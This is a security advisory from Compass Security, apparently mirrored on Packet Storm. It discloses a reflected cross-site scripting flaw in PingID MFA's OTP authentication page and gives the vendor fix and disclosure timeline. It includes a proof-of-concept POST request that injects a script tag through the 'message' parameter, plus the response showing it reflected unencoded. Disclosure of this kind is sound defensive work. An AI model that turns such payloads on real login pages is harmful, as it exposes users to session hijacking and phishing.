PingID MFA Cross Site Scripting

2017-05-17T00:00:00
ID PACKETSTORM:142553
Type packetstorm
Reporter Stephan Sekula
Modified 2017-05-17T00:00:00

Description

                                        
                                            `#############################################################  
#  
# COMPASS SECURITY ADVISORY  
# https://www.compass-security.com/research/advisories/  
#  
#############################################################  
#  
# Product: PingID (MFA) [1]  
# Vendor: Ping Identity Corporation  
# CSNC ID: CSNC-2017-013  
# Subject: Reflected Cross-Site Scripting  
# Risk: High  
# Effect: Remotely exploitable  
# Author: Stephan Sekula <stephan.sekula@compass-security.com>  
# Date: 18.04.2017  
#  
#############################################################  
  
Introduction:  
-------------  
With PingID MFA, you can easily control when your users need to authenticate with a  
second factor. You can configure your policies based upon the following:  
Group - Require MFA for members of a specific group.  
Application - Require MFA for specific applications.  
Geofence - Require MFA if the user is outside a pre-set geofence.  
Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken.  
Network IP - Require MFA if the device isn't in a specific IP range.  
PingID MFA delivers the granular security that your policies require with the ease  
of use your users want. [1]  
  
Compass Security discovered a web application security flaw in PingID's authentication  
process, which allows an attacker to manipulate the resulting website. This allows,  
for instance, attacking the user's browser or redirecting the user to a phishing website.  
  
  
Technical Description  
---------------------  
During the authentication process, a message parameter is used, which can  
be manipulated. If this parameter contains JavaScript code, it is executed  
in the user's browser. Exploiting the vulnerability will lead to so-called  
Cross-Site Scripting (XSS), allowing the execution of JavaScript in the  
context of the victim.  
  
Request:  
POST /pingid/ppm/auth/otp HTTP/1.1  
Host: authenticator.pingone.com  
[CUT]  
Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp  
Connection: close  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 44  
  
otp=123456&message=<script>alert(0)</script>  
  
Response:  
HTTP/1.1 200 OK  
Date: Thu, 13 Apr 2017 11:21:45 GMT  
Server:  
Cache-Control: no-cache, no-store  
[CUT]  
Connection: close  
X-Content-Type-Options: nosniff  
Content-Length: 8313  
  
<!DOCTYPE html>  
<html>  
<head>  
[CUT]  
</head>  
<body>  
[CUT]  
<div class="admin-message"><script>alert(0)</script></div>  
[CUT]  
</body>  
</html>  
  
  
Workaround / Fix:  
-----------------  
The vendor has addressed the vulnerability. In general, this issue can be fixed by  
properly encoding all output, which is posted back to the user.  
For instance, using HTML encoding, to convert < to < and > to >.  
  
  
Timeline:  
---------  
2017-05-16: Coordinated public disclosure date  
2017-05-03: Release of fixed version/patch  
2017-04-20: Initial vendor response  
2017-04-19: Initial vendor notification  
2017-04-13: Discovery by Stephan Sekula  
  
  
References:  
-----------  
[1] https://www.pingidentity.com/en/products/pingid.html  
`